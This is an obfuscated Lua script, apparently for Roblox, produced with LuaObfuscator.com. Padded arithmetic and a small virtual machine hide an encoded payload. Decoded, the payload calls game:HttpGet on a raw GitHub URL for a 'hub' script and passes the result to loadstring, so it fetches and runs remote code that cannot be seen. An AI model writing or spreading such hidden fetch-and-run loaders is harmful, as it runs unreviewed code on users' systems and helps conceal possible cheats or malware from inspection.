--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v84=0 -0 ;local v85;while true do if (v84==(0 -(1637 -(1523 + 114)))) then v85=(v31/((3 -1)^(v32-(2 -1))))%(2^(((v33-(620 -(499 + 56 + 64))) -(v32-(932 -(857 + 74)))) + (569 -((523 -156) + 201)))) ;return v85-(v85%1) ;end end else local v86=(929 -(214 + 713))^(v32-(1 + (1065 -(68 + 997)))) ;return (((v31%(v86 + v86))>=v86) and (1 + 0)) or (877 -((1552 -(226 + 1044)) + 595)) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=0 -0 ;local v35;local v36;local v37;local v38;while true do if (v34==(117 -(32 + 85))) then v35,v36,v37,v38=v1(v16,v19,v19 + 3 + 0 );v19=v19 + 1 + 3 ;v34=958 -(892 + 65) ;end if (v34==(2 -1)) then return (v38 * ((31011962 -(87 + 263)) -14234396)) + (v37 * 65536) + (v36 * (469 -(393 -(67 + 113)))) + v35 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if ((0 + 0)==v39) then v40=0;v41=nil;v39=1 + 0 ;end if (v39==(1 + 2)) then v46=nil;while true do if (v40==(4 -3)) then local v96=0 -0 ;while true do if (v96==0) then v44={v41,v42,nil,v43};v45=v24();v96=1 -0 ;end if (v96==(1263 -(1091 + 171))) then v46={};v40=2;break;end end end if (v40==(0 + 0)) then local v97=0;while true do if (v97~=(0 + 0)) then else v41={};v42={};v97=1146 -(466 + 679) ;end if (v97==(3 -2)) then v43={};v40=3 -2 ;break;end end end if (v40~=(376 -(123 + 251))) then else local v98=0 -0 ;while true do if (v98~=(2 -1)) then else for v122=1901 -(106 + 1794) ,v24() do local v123=698 -(208 + 490) ;local v124;local v125;local v126;while true do if (v123==(0 + 0)) then v124=0 + 0 ;v125=nil;v123=837 -(660 + 176) ;end if (v123~=(2 -1)) then else v126=nil;while true do if (v124~=(1 + 0)) then else while true do if (v125~=0) then else v126=v22();if (v21(v126,203 -(14 + 188) ,676 -(534 + 141) )~=0) then else local v170=0;local v171;local v172;local v173;local v174;local v175;while true do if ((1 + 0)==v170) then v173=nil;v174=nil;v170=586 -(57 + 527) ;end if (v170==(0 + 0)) then v171=103 -(17 + 86) ;v172=nil;v170=1 + 0 ;end if ((2 + 0)~=v170) then else v175=nil;while true do if (v171==1) then local v180=0 -0 ;while true do if (v180==1) then v171=2;break;end if ((0 -0)==v180) then v174=nil;v175=nil;v180=2 -1 ;end end end if (v171==2) then while true do if (v172==(2 + 0)) then local v181=0 + 0 ;while true do if (v181~=(397 -(115 + 281))) then else v172=6 -3 ;break;end if (v181==(0 -0)) then if (v21(v174,1,3 -2 )~=(1 + 0)) then else v175[2]=v46[v175[2 + 0 ]];end if (v21(v174,2,1 + 1 )==1) then v175[7 -4 ]=v46[v175[68 -(30 + 35) ]];end v181=3 -2 ;end end end if (1==v172) then local v182=867 -(550 + 317) ;while true do if (v182~=(1 -0)) then else v172=2 + 0 ;break;end if (v182==(1257 -(1043 + 214))) then local v187=0 -0 ;while true do if (v187==(1212 -(323 + 889))) then v175={v23(),v23(),nil,nil};if (v173==(1665 -(970 + 695))) then local v192=320 -(53 + 267) ;local v193;while true do if (v192==(0 -0)) then v193=1990 -(582 + 1408) ;while true do if (v193==(982 -(18 + 964))) then v175[3]=v23();v175[14 -10 ]=v23();break;end end break;end end elseif (v173==1) then v175[3]=v24();elseif (v173==2) then v175[10 -7 ]=v24() -((2 -0)^16) ;elseif (v173==(11 -8)) then local v198=0;while true do if (v198==(1824 -(1195 + 629))) then v175[3 -0 ]=v24() -((852 -(20 + 830))^(257 -(187 + 54))) ;v175[4 + 0 ]=v23();break;end end end v187=781 -(162 + 618) ;end if (v187==(1 + 0)) then v182=739 -(542 + 196) ;break;end end end end end if ((0 + 0)==v172) then v173=v21(v126,3 -1 ,6 -3 );v174=v21(v126,3 + 1 ,9 -3 );v172=1 + 0 ;end if (v172==3) then if (v21(v174,1 + 2 ,7 -4 )==(1552 -(1126 + 425))) then v175[409 -(118 + 287) ]=v46[v175[1640 -(1373 + 263) ]];end v41[v122]=v175;break;end end break;end if (v171==(0 -0)) then v172=1000 -(451 + 549) ;v173=nil;v171=1 + 0 ;end end break;end end end break;end end break;end if (v124==(0 -0)) then local v167=0 -0 ;while true do if (v167==(378 -(142 + 235))) then v124=1;break;end if ((0 -0)==v167) then v125=1384 -(746 + 638) ;v126=nil;v167=1 + 0 ;end end end end break;end end end v40=3;break;end if ((0 -0)~=v98) then else for v127=342 -(218 + 123) ,v45 do local v128=1581 -(1535 + 46) ;local v129;local v130;local v131;local v132;local v133;while true do if (v128~=2) then else v133=nil;while true do if (v129==0) then local v168=0 + 0 ;while true do if (v168==(1 + 0)) then v129=1 + 0 ;break;end if (0~=v168) then else v130=560 -(306 + 254) ;v131=nil;v168=1;end end end if ((1 + 1)==v129) then while true do if (v130==0) then local v169=0 -0 ;while true do if (v169~=0) then else v131=1467 -(899 + 568) ;v132=nil;v169=1 + 0 ;end if (v169==(2 -1)) then v130=2 -1 ;break;end end end if (v130==(604 -(268 + 335))) then v133=nil;while true do if (v131==(291 -(60 + 230))) then if (v132==(4 -3)) then v133=v22()~=(572 -(426 + 146)) ;elseif (v132==(1 + 1)) then v133=v25();elseif (v132~=(2 + 1)) then else v133=v26();end v46[v127]=v133;break;end if (v131==(1456 -(282 + 1174))) then local v177=0;local v178;local v179;while true do if (v177==1) then while true do if (v178==(811 -(569 + 242))) then v179=0;while true do if (v179~=(0 -0)) then else local v184=0 + 0 ;while true do if (v184==(1025 -(706 + 318))) then v179=1 + 0 ;break;end if (v184==0) then v132=v22();v133=nil;v184=1252 -(721 + 530) ;end end end if (v179~=(1203 -(373 + 829))) then else v131=1272 -(945 + 326) ;break;end end break;end end break;end if ((0 -0)==v177) then v178=1130 -(369 + 761) ;v179=nil;v177=1 + 0 ;end end end end break;end end break;end if (v129==(701 -(271 + 429))) then v132=nil;v133=nil;v129=2 + 0 ;end end break;end if (v128==0) then v129=0 -0 ;v130=nil;v128=1501 -(1408 + 92) ;end if (v128==1) then v131=nil;v132=nil;v128=240 -(64 + 174) ;end end end v44[1089 -(461 + 625) ]=v22();v98=1289 -(993 + 295) ;end end end if (v40~=3) then else local v99=0;local v100;while true do if (v99==0) then v100=0 + 0 ;while true do if (v100~=0) then else for v157=1,v24() do v42[v157-1 ]=v29();end return v44;end end break;end end end end break;end if (v39~=(1173 -(418 + 753))) then else v44=nil;v45=nil;v39=2 + 1 ;end if (v39~=(337 -(144 + 192))) then else v42=nil;v43=nil;v39=218 -(42 + 174) ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=0 -0 ;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v47==(1 + 0)) then v50=1 + 0 ;v51=(v21(v49,1,1633 -(1565 + 48) ) * ((1 + 1 + 0)^((2263 -727) -(363 + 1141)))) + v48 ;v47=1582 -(1183 + 397) ;end if (v47==(5 -3)) then v52=v21(v49,16 + 5 ,24 + 7 );v53=((v21(v49,2007 -((3005 -(975 + 117)) + 62) )==(1 + 0)) and  -(2 -1)) or ((3809 -(157 + 1718)) -(565 + 1368)) ;v47=11 -8 ;end if ((1661 -((2615 -(782 + 356)) + 184))==v47) then v48=v24();v49=v24();v47=1 -0 ;end if (v47==(3 + 0)) then if (v52==(856 -(564 + 292))) then if (v51==0) then return v53 * (0 -0) ;else v52=2 -1 ;v50=(247 + 57) -(244 + 60) ;end elseif (v52==(1574 + 473)) then return ((v51==0) and (v53 * ((477 -(41 + 435))/(1001 -((1205 -(176 + 91)) + 63))))) or (v53 * NaN) ;end return v8(v53,v52-(787 + 236) ) * (v50 + (v51/((1127 -(936 + (670 -481)))^(18 + 34)))) ;end end end v26=nil;function v26(v54)local v55;if  not v54 then v54=v24();if (v54==(0 -0)) then return "";end end v55=v3(v16,v19,(v19 + v54) -(1019 -(697 + 321)) );v19=v19 + v54 ;local v56={};for v68=1, #v55 do v56[v68]=v2(v1(v3(v55,v68,v68)));end return v6(v56);end v18=5;end if (v18==2) then function v22()local v57=v1(v16,v19,v19);v19=v19 + 1 ;return v57;end v23=nil;function v23()local v58=0 -0 ;local v59;local v60;while true do if (v58==(1 -0)) then return (v60 * (590 -334)) + v59 ;end if (v58==(0 + 0)) then v59,v60=v1(v16,v19,v19 + (3 -1) );v19=v19 + ((616 -(602 + 9)) -3) ;v58=(2417 -(449 + 740)) -(322 + 905) ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then v20=v0(v3(v61,1,1));return "";else local v87=v2(v0(v61,16));if v20 then local v91=v5(v87,v20);v20=nil;return v91;else return v87;end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v70=v65;local v71=v66;local v72=v67;local v73=v28;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v88=0,v78 do if (v88>=v72) then v76[v88-v72 ]=v77[v88 + 1 ];else v80[v88]=v77[v88 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do v82=v70[v74];v83=v82[1];if (v83<=3) then if (v83<=1) then if (v83>0) then v80[v82[2]]=v82[3];else local v103=0;local v104;local v105;local v106;local v107;local v108;while true do if (v103==2) then v108=v82[2];v107=v80[v82[3]];v80[v108 + 1 ]=v107;v80[v108]=v107[v82[4]];v74=v74 + 1 ;v103=3;end if (v103==0) then v104=nil;v105,v106=nil;v107=nil;v108=nil;if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v64;else v80[v82[2]]=v64[v82[3]];end v103=1;end if (v103==4) then v105,v106=v73(v80[v108](v13(v80,v108 + 1 ,v82[3])));v75=(v106 + v108) -1 ;v104=0;for v152=v108,v75 do local v153=0;while true do if (v153==0) then v104=v104 + 1 ;v80[v152]=v105[v104];break;end end end v74=v74 + 1 ;v103=5;end if (v103==1) then v74=v74 + 1 ;v82=v70[v74];if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v64;else v80[v82[2]]=v64[v82[3]];end v74=v74 + 1 ;v82=v70[v74];v103=2;end if (v103==5) then v82=v70[v74];v108=v82[2];v80[v108]=v80[v108](v13(v80,v108 + 1 ,v75));v74=v74 + 1 ;v82=v70[v74];v103=6;end if (v103==3) then v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v108=v82[2];v103=4;end if (v103==6) then v80[v82[2]]();v74=v74 + 1 ;v82=v70[v74];do return;end break;end end end elseif (v83==2) then v80[v82[2]]();else local v109=0;local v110;local v111;local v112;local v113;while true do if (v109==2) then for v154=v110,v75 do v113=v113 + 1 ;v80[v154]=v111[v113];end break;end if (v109==1) then v75=(v112 + v110) -1 ;v113=0;v109=2;end if (v109==0) then v110=v82[2];v111,v112=v73(v80[v110](v13(v80,v110 + 1 ,v82[3])));v109=1;end end end elseif (v83<=5) then if (v83>4) then if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v64;else v80[v82[2]]=v64[v82[3]];end else local v114=v82[2];v80[v114]=v80[v114](v13(v80,v114 + 1 ,v75));end elseif (v83==6) then local v116=v82[2];local v117=v80[v82[3]];v80[v116 + 1 ]=v117;v80[v116]=v117[v82[4]];else do return;end end v74=v74 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403593O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F47616D6572312O34726F626C6F782F47616D6572312O342D6875622F6D61696E2F54254333252O416E2532304875622E6C75612E74787400083O00124O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);